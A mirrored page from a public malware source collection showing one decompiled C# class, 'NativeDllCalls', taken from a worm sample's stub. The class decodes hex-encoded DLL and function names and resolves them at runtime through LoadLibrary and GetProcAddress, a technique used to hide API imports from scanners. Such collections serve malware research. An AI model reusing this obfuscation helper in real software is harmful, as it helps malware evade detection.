mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
92 lines
2.9 KiB
C#
92 lines
2.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: BCV5StuB.NativeDllCalls
|
|||
|
|
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
|
|||
|
|
|
|||
|
|
using Microsoft.VisualBasic;
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using Microsoft.Win32.SafeHandles;
|
|||
|
|
using System;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.Globalization;
|
|||
|
|
using System.Runtime.ConstrainedExecution;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
using System.Security.Permissions;
|
|||
|
|
|
|||
|
|
namespace BCV5StuB
|
|||
|
|
{
|
|||
|
|
public abstract class NativeDllCalls
|
|||
|
|
{
|
|||
|
|
[DebuggerNonUserCode]
|
|||
|
|
public NativeDllCalls()
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public Delegate DynamicCall(string sHexLib, string sHexMethod, Type oType)
|
|||
|
|
{
|
|||
|
|
string fileName = this.HexToString(sHexLib);
|
|||
|
|
string procname = this.HexToString(sHexMethod);
|
|||
|
|
NativeDllCalls.SafeLibraryHandle hModule = NativeDllCalls.Methods.LoadLibrary(fileName);
|
|||
|
|
Delegate @delegate = (Delegate) null;
|
|||
|
|
if (!hModule.IsInvalid && !hModule.IsClosed)
|
|||
|
|
{
|
|||
|
|
@delegate = Marshal.GetDelegateForFunctionPointer(NativeDllCalls.Methods.GetProcAddress(hModule, procname), oType);
|
|||
|
|
hModule.Close();
|
|||
|
|
}
|
|||
|
|
return @delegate;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public string HexToString(string sText)
|
|||
|
|
{
|
|||
|
|
string str1 = sText;
|
|||
|
|
string str2 = "";
|
|||
|
|
if (str1.StartsWith("0x"))
|
|||
|
|
str1 = str1.Substring(2);
|
|||
|
|
int startIndex = 0;
|
|||
|
|
while (startIndex < str1.Length)
|
|||
|
|
{
|
|||
|
|
string s = str1.Substring(startIndex, 2);
|
|||
|
|
str2 += Conversions.ToString(Strings.ChrW((int) ushort.Parse(s, NumberStyles.HexNumber)));
|
|||
|
|
checked { startIndex += 2; }
|
|||
|
|
}
|
|||
|
|
return str2;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[SecurityPermission(SecurityAction.LinkDemand, UnmanagedCode = true)]
|
|||
|
|
public sealed class SafeLibraryHandle : SafeHandleZeroOrMinusOneIsInvalid
|
|||
|
|
{
|
|||
|
|
private SafeLibraryHandle()
|
|||
|
|
: base(true)
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
protected override bool ReleaseHandle() => NativeDllCalls.Methods.FreeLibrary(this.handle);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public sealed class Methods
|
|||
|
|
{
|
|||
|
|
private const string KERNEL32 = "kernel32";
|
|||
|
|
|
|||
|
|
[DebuggerNonUserCode]
|
|||
|
|
public Methods()
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true, BestFitMapping = false)]
|
|||
|
|
public static extern NativeDllCalls.SafeLibraryHandle LoadLibrary(
|
|||
|
|
string fileName);
|
|||
|
|
|
|||
|
|
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
|
|||
|
|
[DllImport("kernel32", SetLastError = true)]
|
|||
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|||
|
|
public static extern bool FreeLibrary(IntPtr hModule);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32")]
|
|||
|
|
public static extern IntPtr GetProcAddress(
|
|||
|
|
NativeDllCalls.SafeLibraryHandle hModule,
|
|||
|
|
string procname);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|